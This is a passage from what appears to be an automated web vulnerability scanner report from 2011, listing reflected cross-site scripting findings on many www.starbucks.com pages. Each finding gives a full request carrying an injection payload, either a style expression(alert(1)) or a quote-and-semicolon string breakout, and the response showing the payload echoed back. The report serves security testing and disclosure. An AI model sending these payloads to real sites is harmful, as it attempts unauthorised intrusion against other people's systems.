Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:06 GMT
Connection: close
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/product-advisories?4cd5c"style="x:expression(alert(1))"3d37d7257db=1" />
...[SNIP]...

2.9. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfef"style="x:expression(alert(1))"1c51ac66bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/our-heritage?5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:04 GMT
Connection: close
Content-Length: 37603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/our-heritage?5cfef"style="x:expression(alert(1))"1c51ac66bf6=1" />
...[SNIP]...

2.10. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8439b"style="x:expression(alert(1))"d1ac5f7cb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business?8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:27 GMT
Connection: close
Content-Length: 36606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business?8439b"style="x:expression(alert(1))"d1ac5f7cb9a=1" />
...[SNIP]...

2.11. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/foodservice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56659"style%3d"x%3aexpression(alert(1))"563fe89e48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56659"style="x:expression(alert(1))"563fe89e48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/foodservice?56659"style%3d"x%3aexpression(alert(1))"563fe89e48e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:28 GMT
Connection: close
Content-Length: 35775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/foodservice?56659"style="x:expression(alert(1))"563fe89e48e=1" />
...[SNIP]...

2.12. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/international-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45cc2"style="x:expression(alert(1))"db7f4597e3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/international-stores?45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:12 GMT
Connection: close
Content-Length: 36211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/international-stores?45cc2"style="x:expression(alert(1))"db7f4597e3f=1" />
...[SNIP]...

2.13. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/licensed-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4641a"style%3d"x%3aexpression(alert(1))"960dd899042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4641a"style="x:expression(alert(1))"960dd899042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/licensed-stores?4641a"style%3d"x%3aexpression(alert(1))"960dd899042=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:26 GMT
Connection: close
Content-Length: 35650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/licensed-stores?4641a"style="x:expression(alert(1))"960dd899042=1" />
...[SNIP]...

2.14. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/office-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c588f"style="x:expression(alert(1))"7c2218a24c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/office-coffee?c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 37633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/office-coffee?c588f"style="x:expression(alert(1))"7c2218a24c5=1" />
...[SNIP]...

2.15. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd912"style="x:expression(alert(1))"c7bd23ee043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center?cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:13 GMT
Connection: close
Content-Length: 42847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center?cd912"style="x:expression(alert(1))"c7bd23ee043=1" />
...[SNIP]...

2.16. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23fe"%3balert(1)//0dffb39826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c23fe";alert(1)//0dffb39826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center?c23fe"%3balert(1)//0dffb39826=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:15 GMT
Connection: close
Content-Length: 42747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ext/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759753001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center?c23fe";alert(1)//0dffb39826=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.17. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45639"style="x:expression(alert(1))"a3851b9f98e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity?45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:02 GMT
Connection: close
Content-Length: 38646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity?45639"style="x:expression(alert(1))"a3851b9f98e=1" />
...[SNIP]...

2.18. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b53"%3balert(1)//fc24e1787a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62b53";alert(1)//fc24e1787a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/career-diversity/partner-networks?62b53"%3balert(1)//fc24e1787a8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:21 GMT
Connection: close
Content-Length: 40731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
s = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "275225263001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/career-diversity/partner-networks?62b53";alert(1)//fc24e1787a8=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.19. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae7f1"style="x:expression(alert(1))"dbb34cb95f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity/partner-networks?ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:17 GMT
Connection: close
Content-Length: 40826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity/partner-networks?ae7f1"style="x:expression(alert(1))"dbb34cb95f4=1" />
...[SNIP]...

2.20. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/international-positions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab6ec"style="x:expression(alert(1))"95aa1e09f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/international-positions?ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:03 GMT
Connection: close
Content-Length: 36752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/international-positions?ab6ec"style="x:expression(alert(1))"95aa1e09f92=1" />
...[SNIP]...

2.21. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 287e3"%3balert(1)//6be60617140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 287e3";alert(1)//6be60617140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/working-at-starbucks?287e3"%3balert(1)//6be60617140=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:39 GMT
Connection: close
Content-Length: 43747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "651624292001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/working-at-starbucks?287e3";alert(1)//6be60617140=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.22. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 587cf"style="x:expression(alert(1))"c23cb73b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/working-at-starbucks?587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:37 GMT
Connection: close
Content-Length: 43842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/working-at-starbucks?587cf"style="x:expression(alert(1))"c23cb73b348=1" />
...[SNIP]...

2.23. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
